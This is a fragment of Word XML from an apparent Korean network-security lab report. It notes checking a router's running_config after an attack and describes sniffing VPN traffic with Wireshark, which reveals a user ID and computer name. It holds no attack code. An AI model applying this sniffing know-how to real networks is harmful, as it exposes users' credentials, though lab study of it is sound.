          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2225040" cy="1569720"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="125" name="그림 125" descr="https://lh4.googleusercontent.com/Hx_vA5V1fR5ttcdg1D3wul9SCZXWlIHoVXAsmHwJ27VpwZ_9RIKGMK_vPToVj_1C9HckLkMFDUP1zm7v9kNchrzS57c5zc1yPnYMIqzQ5QfdfJFhds2uOW9AsnF4VQk6xJs6tB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lh4.googleusercontent.com/Hx_vA5V1fR5ttcdg1D3wul9SCZXWlIHoVXAsmHwJ27VpwZ_9RIKGMK_vPToVj_1C9HckLkMFDUP1zm7v9kNchrzS57c5zc1yPnYMIqzQ5QfdfJFhds2uOW9AsnF4VQk6xJs6tBpH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>
            <wp:extent cx="2286000" cy="1592580"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="126" name="그림 126" descr="https://lh3.googleusercontent.com/tOs8yJxZE7v2VQfY9LE5TSw2BBYICmxkeU37QkevFtsL3HHI8WxtxzL2kMBgcYf8UzVKcFnZ-OPPnZMreyA9qz2l_BC7E_yONg-AEF0LJ3sO8tDjn79p8ZVbQ6f7xG8-yyEKsz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lh3.googleusercontent.com/tOs8yJxZE7v2VQfY9LE5TSw2BBYICmxkeU37QkevFtsL3HHI8WxtxzL2kMBgcYf8UzVKcFnZ-OPPnZMreyA9qz2l_BC7E_yONg-AEF0LJ3sO8tDjn79p8ZVbQ6f7xG8-yyEKszw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Cs w:val="20"/>
        </w:rPr>
        <w:t>공격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됐는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하기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위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다시</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> running_config </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>상태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파일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받</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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받아온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파일에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내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바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내용이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제대로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적용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됐는지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확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006024F5" w:rsidRDefault="006024F5" w:rsidP="006024F5">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1164"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006024F5" w:rsidRPr="006024F5" w:rsidRDefault="006024F5" w:rsidP="006024F5">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>VPN Sniffing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006024F5" w:rsidRDefault="006024F5" w:rsidP="006024F5">
      <w:pPr>
        <w:ind w:left="80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09800" cy="1775460"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="127" name="그림 127" descr="https://lh4.googleusercontent.com/0Sandl5lAFv8U2nlQHmKE8ZtxUYZ52UWOUX2jzb6d4K3zKR2gS7xC8ZZB496sRc7IGIZ8qfYg0pdl16N5PXKwq4poZXuC1v-ZBf70A9RNqCtYO1N65ah_wBqQ5s82i9Yj2mb-F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lh4.googleusercontent.com/0Sandl5lAFv8U2nlQHmKE8ZtxUYZ52UWOUX2jzb6d4K3zKR2gS7xC8ZZB496sRc7IGIZ8qfYg0pdl16N5PXKwq4poZXuC1v-ZBf70A9RNqCtYO1N65ah_wBqQ5s82i9Yj2mb-FK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F5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2293620" cy="1783080"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="128" name="그림 128" descr="https://lh6.googleusercontent.com/DqIDWSJLOZ4sGJU7KPNI6eQmo9X6XOAaGKC8212HQAzSC0VgtKHsEfi2joBaueAIMEDHqRoG7xQgYnTSJC8gFieyP5_0fo626jl0qjblASWrZ0Zhm51G9QO7nq52Y3uFoua_GN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lh6.googleusercontent.com/DqIDWSJLOZ4sGJU7KPNI6eQmo9X6XOAaGKC8212HQAzSC0VgtKHsEfi2joBaueAIMEDHqRoG7xQgYnTSJC8gFieyP5_0fo626jl0qjblASWrZ0Zhm51G9QO7nq52Y3uFoua_GN1Z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szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>지사의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컴퓨터를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이용해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본사</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> VPN </w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버에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접속</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006024F5" w:rsidRDefault="006024F5" w:rsidP="006024F5">
      <w:pPr>
        <w:ind w:left="804"/>
        <w:rPr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4579620" cy="281940"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="129" name="그림 129" descr="https://lh6.googleusercontent.com/fGKzU8KLdTfnKbRyY1z7qAogzLBxFtb84LMbOKR0eB_RB3BetE0ZDd7crHO62FQSIs59M9cLpqeZaa4XtuNZylTauUuELe9Z4f_BY_iIFI-B-mgU8_iI9lNSX7O11wOnRsX2x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lh6.googleusercontent.com/fGKzU8KLdTfnKbRyY1z7qAogzLBxFtb84LMbOKR0eB_RB3BetE0ZDd7crHO62FQSIs59M9cLpqeZaa4XtuNZylTauUuELe9Z4f_BY_iIFI-B-mgU8_iI9lNSX7O11wOnRsX2xOo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5" w:rsidRPr="006024F5" w:rsidRDefault="006024F5" w:rsidP="006024F5">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ire Shark</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>로</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia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확인해보면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아이디와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컴퓨터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이름을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볼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수</w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006024F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>있음</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006024F5" w:rsidRPr="006024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17" w:rsidRDefault="00E16A17" w:rsidP="00865A68">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00E16A17" w:rsidRDefault="00E16A17" w:rsidP="0086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17" w:rsidRDefault="00E16A17" w:rsidP="00865A68">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00E16A17" w:rsidRDefault="00E16A17" w:rsidP="0086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3CD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94AAE91E"/>
    <w:lvl w:ilvl="0" w:tplc="C5E09F74">
      <w:start w:val="1"/>
      <w:numFmt w:val="ganada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" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="02DD1384"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="216CABDA"/>
    <w:lvl w:ilvl="0" w:tplc="D7A09D3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="ganada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" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="039D5A30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8828EFAE"/>
    <w:lvl w:ilvl="0" w:tplc="4F1A3124">
      <w:start w:val="8"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="&gt;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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0EAA5012"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B9AFD50"/>
    <w:lvl w:ilvl="0" w:tplc="B9A685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E637BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F496A932"/>
    <w:lvl w:ilvl="0" w:tplc="ACF82F9C">
      <w:start w:val="1"/>
      <w:numFmt w:val="ganada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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1C4E0546"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D82DDB0"/>
    <w:lvl w:ilvl="0" w:tplc="1084156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05F25AB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DCEE307A"/>
    <w:lvl w:ilvl="0" w:tplc="5AB2DBF4">
      <w:start w:val="1"/>
      <w:numFmt w:val="ganada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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="240505F8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="41FA7FA0"/>
    <w:lvl w:ilvl="0" w:tplc="F7563194">
      <w:start w:val="1"/>
      <w:numFmt w:val="ganada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26DA3635"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8446050"/>
    <w:lvl w:ilvl="0" w:tplc="851E5EC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A296A75"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B36853D8"/>
    <w:lvl w:ilvl="0" w:tplc="9BC66C72">
      <w:start w:val="1"/>
      <w:numFmt w:val="ganada"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3E83721A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E6CEB7E"/>
    <w:lvl w:ilvl="0" w:tplc="838AA93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688030E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C6E82668"/>
    <w:lvl w:ilvl="0" w:tplc="D416CCA8">
      <w:start w:val="1"/>
      <w:numFmt w:val="ganada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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="496D2DDB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AED6D3BC"/>
    <w:lvl w:ilvl="0" w:tplc="05D0720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9F0329F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1F240156"/>
    <w:lvl w:ilvl="0" w:tplc="3F8C6FC4">
      <w:start w:val="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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="518C33BA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C4823B80"/>
    <w:lvl w:ilvl="0" w:tplc="C06EAF3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalEnclosedCircle"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="184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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5DCE68FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD6EB264"/>
    <w:lvl w:ilvl="0" w:tplc="AA6A2C8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178001A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1B64C36"/>
    <w:lvl w:ilvl="0" w:tplc="BB7895FE">
      <w:start w:val="8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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7C354B62"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B2063362"/>
    <w:lvl w:ilvl="0" w:tplc="BFE8ADD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68"/>
    <w:rsid w:val="000404FC"/>
    <w:rsid w:val="0010076E"/>
    <w:rsid w:val="00220989"/>
    <w:rsid w:val="0040771B"/>
    <w:rsid w:val="0048009A"/>
    <w:rsid w:val="004A2C87"/>
    <w:rsid w:val="004A79E9"/>
    <w:rsid w:val="005D4EB1"/>
    <w:rsid w:val="006024F5"/>
    <w:rsid w:val="007D6EE5"/>
    <w:rsid w:val="00802FA8"/>
    <w:rsid w:val="00865A68"/>
    <w:rsid w:val="008E3ABE"/>
    <w:rsid w:val="008F510A"/>
    <w:rsid w:val="009321F3"/>
    <w:rsid w:val="00965F61"/>
    <w:rsid w:val="00B609F1"/>
    <w:rsid w:val="00C73585"/>
    <w:rsid w:val="00CE3782"/>
    <w:rsid w:val="00CF524B"/>
    <w:rsid w:val="00E1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74AEB2-B1F4-492C-BF21-AA0577BC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A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65A68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865A68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865A68"/>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0086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5DD5-89D4-4A78-998D-40EA1997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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-06-26T03:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-06-26T11:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>